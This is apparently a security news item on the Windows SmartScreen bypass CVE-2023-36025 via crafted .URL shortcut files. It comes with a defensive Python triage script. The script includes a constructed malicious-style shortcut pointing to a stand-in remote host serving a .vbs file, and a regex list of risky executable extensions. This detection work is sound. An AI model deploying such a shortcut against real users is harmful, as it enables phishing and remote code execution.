Researchers have reverse-engineered the patch Microsoft issued for CVE-2023-36025 to build a proof-of-concept (PoC) exploit. The vulnerability was exploited in the wild as a zero-day before it was discovered and patched. The flaw, rated 8.8 on the CVSS scale, is a security feature bypass in the Windows SmartScreen component.
According to Microsoft's advisory, the flaw lets an attacker bypass the standard SmartScreen checks and the warning prompts that normally accompany them. To be compromised, a user has to click a specially crafted Internet Shortcut (.URL) file or a hyperlink that points to one. The advisory, issued as part of this month's Patch Tuesday updates, states, “The attacker would be able to bypass Windows Defender SmartScreen checks and their associated prompts,” and “The user would have to click on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file to be compromised by the attacker.”
Discovery and reporting of the vulnerability are credited to Will Metcalf of Splunk, Microsoft Threat Intelligence, and the Microsoft Office Product Group Security Team. The exploit uses an Internet Shortcut file that looks harmless but silently redirects to a malicious website. The shortcut's IconFile path, which can be a network location the attacker controls, can also reference a malicious payload. Delivery can be as mundane as a phishing email or a compromised website.
When a user clicks the crafted .URL file, no SmartScreen warning appears; the user is sent to the malicious site or triggers code execution without realising it. Security Lit Limited has developed a PoC exploit demonstrating CVE-2023-36025 in practice. The PoC shows the core of the vulnerability: a crafted Internet Shortcut file or hyperlink that SmartScreen fails to flag, opening the door to further exploitation.
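The two paragraphs above describe the artefact at the heart of this bug: an INI-style .URL file whose `URL=` and `IconFile=` fields point at locations the attacker controls. The following is an added example, written for this page and not taken from the Security Lit PoC or from Microsoft; it parses that format and applies a simple triage heuristic a defender might run over .URL attachments pulled from a mail gateway or an endpoint. The two sample shortcuts are constructed (the 198.51.100.7 address is a documentation range), and the remote-scheme set and extension list are my own assumptions, not a vendor signature.

```python
import configparser
import re
from urllib.parse import urlparse

# Constructed samples, not the published PoC. The first is an ordinary
# web shortcut; the second points both fields at an attacker-style host.
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
"""

SUSPICIOUS_URL_FILE = r"""[InternetShortcut]
URL=file://198.51.100.7/share/invoice.vbs
IconFile=\\198.51.100.7\share\icon.ico
IconIndex=0
"""

# Assumed heuristics: schemes that fetch from a remote host, and file
# extensions Windows will execute or interpret when the target is opened.
REMOTE_SCHEMES = {"file", "http", "https", "ftp"}
RISKY_EXTENSION = re.compile(
    r"\.(vbs|vbe|js|jse|wsf|wsh|hta|exe|dll|cpl|scr|lnk|bat|cmd|ps1|msi|url)$",
    re.IGNORECASE,
)


def parse_url_shortcut(text: str) -> dict[str, str]:
    """Return the [InternetShortcut] section of a .URL file as a dict.

    .URL files are INI-formatted; keys are kept case-sensitive and only
    '=' is treated as a delimiter so 'C:\\...' and 'https://' survive.
    An input without the expected section yields an empty dict.
    """
    cp = configparser.ConfigParser(
        interpolation=None, strict=False, delimiters=("=",)
    )
    cp.optionxform = str  # keep 'URL' and 'IconFile' as written
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def is_remote_path(value: str) -> bool:
    """True for a UNC path (\\\\host\\share) or a remote URL scheme."""
    if value.startswith("\\\\"):
        return True
    return urlparse(value).scheme.lower() in REMOTE_SCHEMES


def assess_url_shortcut(text: str) -> list[str]:
    """Return a list of human-readable findings; empty means nothing flagged."""
    fields = parse_url_shortcut(text)
    if not fields:
        return ["no [InternetShortcut] section"]
    findings = []

    url = fields.get("URL", "")
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    # A shortcut that opens anything other than a web page is unusual.
    if scheme not in {"http", "https"}:
        findings.append(f"URL uses non-web scheme '{scheme or 'none'}'")
    # A web-looking URL ending in a script/executable is worth a look too.
    if RISKY_EXTENSION.search(parsed.path):
        findings.append("URL target has an executable/script extension")

    # The IconFile field is resolved when the shortcut is rendered, so a
    # remote or UNC icon path is a classic tell for an attacker-controlled host.
    icon = fields.get("IconFile", "")
    if icon and is_remote_path(icon):
        findings.append("IconFile points to a remote/UNC location")
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_URL_FILE), ("suspicious", SUSPICIOUS_URL_FILE)):
        print(name, "->", assess_url_shortcut(sample) or ["clean"])
```

Running it flags nothing for the benign shortcut and three findings for the constructed suspicious one (non-web scheme, script extension, remote IconFile). The heuristic is deliberately noisy rather than precise: intranet shortcuts with UNC icon paths exist, so treat a hit as a reason to detonate or quarantine the file, not as proof of exploitation of this particular CVE.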
Microsoft has released a patch for this vulnerability, and users are strongly advised to apply it immediately to protect their systems.